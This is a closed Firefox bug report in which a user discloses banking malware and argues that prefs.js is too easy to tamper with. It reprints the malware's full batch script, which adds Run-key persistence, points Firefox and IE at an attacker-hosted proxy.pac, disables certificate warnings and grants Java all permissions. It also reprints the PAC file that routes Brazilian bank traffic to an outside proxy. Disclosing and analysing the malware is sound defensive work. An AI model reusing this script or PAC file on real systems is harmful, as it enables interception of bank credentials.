Closed Bug 503970 Opened 15 years ago Closed 15 years ago

Firefox is a virus target

Categories: Firefox :: Security, defect
Version: 3.5 Branch
Platform: x86, Windows XP
Priority: Not set
Severity: major
Status: RESOLVED INVALID
Reporter: renatoyamane (Unassigned)
Attachments: 3 files

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)

I have checked that Firefox is a virus target.
The virus changes proxy settings to redirect all connections to an external proxy, capturing all bank information:

@shift
::@echo off
@break off

if exist %temp%\iecfg.dll goto con
::add to regedit
> %temp%\iecfg.dll echo y
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v JavaPlugin /t REG_SZ /d "%temp%\csrrs.exe" < %temp%\iecfg.dll
start /low /min iexplore.exe "http://adobe.shockwavesfx.com/successful.php"
goto mapa
::Connection test
:con
set ping=%windir%\system32\ping.exe
:test
%ping% 74.125.159.99 -n 1 -l 1 | find "TTL" > nul
if not errorlevel 1 goto mapa
goto teste
:mapa
::Get IP
FOR /F "TOKENS=3 delims=: " %%E IN ('%windir%\system32\ping.exe proxy.shockwavesfx.com -n 1 -l 1 ^| find.exe "TTL" ') DO SET ip=%%E



FOR /F "TOKENS=*" %%E IN ('dir "%HoMePath%\.." /b /s ^| find "prefs.js"') DO %windir%\system32\attrib.exe -r -a -s -h "%%E" && echo user_pref("network.proxy.autoconfig_url", "http://%ip%/proxy.pac"); >> "%%E"
FOR /F "TOKENS=*" %%E IN ('dir "%HoMePath%\.." /b /s ^| find "prefs.js"') DO %windir%\system32\attrib.exe -r -a -s -h "%%E" && echo user_pref("network.proxy.type", 2); >> "%%E"



type %temp%\~a.tmp | find.exe "Internet Explorer\Main">%temp%\~b.tmp && for /f "tokens=2 delims=\" %%D in ('type %temp%\~b.tmp ^| find.exe "S-1-5-21"') do set CSL=%%D
echo y|%windir%\system32\reg.exe add "HKU\%CSL%\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "WarnonBadCertRecving" /t REG_DWORD /d "0x00000000" /f


cd %HoMePath%
::Add Proxy to IE*
echo Windows Registry Editor Version 5.00 > iecfg.reg
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings] >> iecfg.reg
echo "AutoConfigURL"="http://%ip%/proxy.pac" >> iecfg.reg
echo "EnableHttp1_1"=dword:00000001 >> iecfg.reg
echo "ProxyEnable"=dword:00000000 >> iecfg.reg
echo "ProxyHttp1.1"=dword:00000000 >> iecfg.reg
regedit /s iecfg.reg
del iecfg.reg


::Allow java applet
cd %windir%
cd ..
FOR /F "TOKENS=*" %%E IN ('dir /b /s ^| find /i "java.policy"') DO echo grant {  permission java.security.AllPermission;}; > "%%E"
:no

::exit

Reproducible: Always

Actual Results:
prefs.js is very easy to change by an external action.

Expected Results:
When prefs.js is changed, the user needs to be informed when Firefox runs.
Component: General → Security
Version: unspecified → 3.5 Branch
http://securityproxy1.no-ip.biz/proxy.pac has this content (I have already told no-ip to block this address):

=============================================
function FindProxyForURL(url, host) {
    var n = new Array("www.bradesco.com.br","bradesco.com.br","bradesco.com",
"www.cef.com.br","cef.com.br","www.caixa.com.br","caixa.com.br","www.cef.gov.br","cef.gov.br","www.caixaeconomica.com.br","caixaeconomica.com.br","www.caixaeconomicafederal.com.br","caixaeconomicafederal.com.br","www.caixa.gov.br","caixa.gov.br","www.itau.com.br","itau.com.br","www.real.com.br","real.com.br","www.bancoreal.com.br","bancoreal.com.br","www.bb.com.br","bb.com.br","www.bancodobrasil.com.br","bancodobrasil.com.br","www.bancobrasil.com.br","bancobrasil.com.br","www.santander.com.br","santander.com.br","www.banespa.com.br","banespa.com.br","www.santanderbanespa.com.br","santanderbanespa.com.br","www.itaupersonnalite.com.br","itaupersonnalite.com.br","www.itauprivatebank.com.br","itauprivatebank.com.br","www.unibanco.com.br","unibanco.com.br");

    for (var i = 0; i < n.length; i++) {
        if (shExpMatch(host, n[i])) {
            return "PROXY 72.20.10.175:80";
        }
    }

    return "DIRECT";
}
=============================================

All these sites are Brazilian banks.
The virus changed...

- From csrrs.exe to iexplorer.exe
- From batch file (.bat) to executable file (.exe).
- And now, proxy is http://proxy.shockwavesfxlive.in/proxy.pac

I will attach the iexplorer.exe, iexplorer.dll and finder.exe

All these files are placed in:
C:\Documents and Settings\USER\Local Settings\Temp
Can someone confirm this problem?
It is not comfortable having all bank account traffic redirected to an external proxy.
Being the target of a virus isn't a security hole. But maybe dveditz can tell you what he knows about this virus.
Group: core-security
Status: UNCONFIRMED → RESOLVED
Closed: 15 years ago
Resolution: --- → INVALID
Jesse, I agree that "target of a virus isn't a security hole", *but* this kind of worm shows us that it is VERY EASY to change important parameters in Firefox.

A simple batch file can do:
echo user_pref("network.proxy.autoconfig_url", "proxy.pac"); >> prefs.js

I think that a text file (prefs.js) can't exist to do important things!

Any script kiddie can edit this kind of file easily.
Obfuscating configuration files is not a very strong security measure.
But a txt file (such as prefs.js) can be edited by any *KID*.
This is trivial!

A lot of other worms will appear using a simple "echo" to edit Firefox config files.

Redirecting the traffic of financial institutions (as this worm does) is very dangerous to Firefox users.
Getting access to your computer is a much higher bar than editing a text file or a binary blob.
Think with me:

- A user receives a batch file (click here to see Britney Spears nude)
- This file edits, using "echo", the prefs.js, enabling the proxy.
- All financial institution data will be redirected to an external proxy.
- The cracker will get your account number, credit card information, etc.

This kind of worm (batch file) will never be caught by anti-virus.

I know that the user can't click on anything, but we know that the user will do that!

And IMHO Firefox needs to avoid this kind of situation.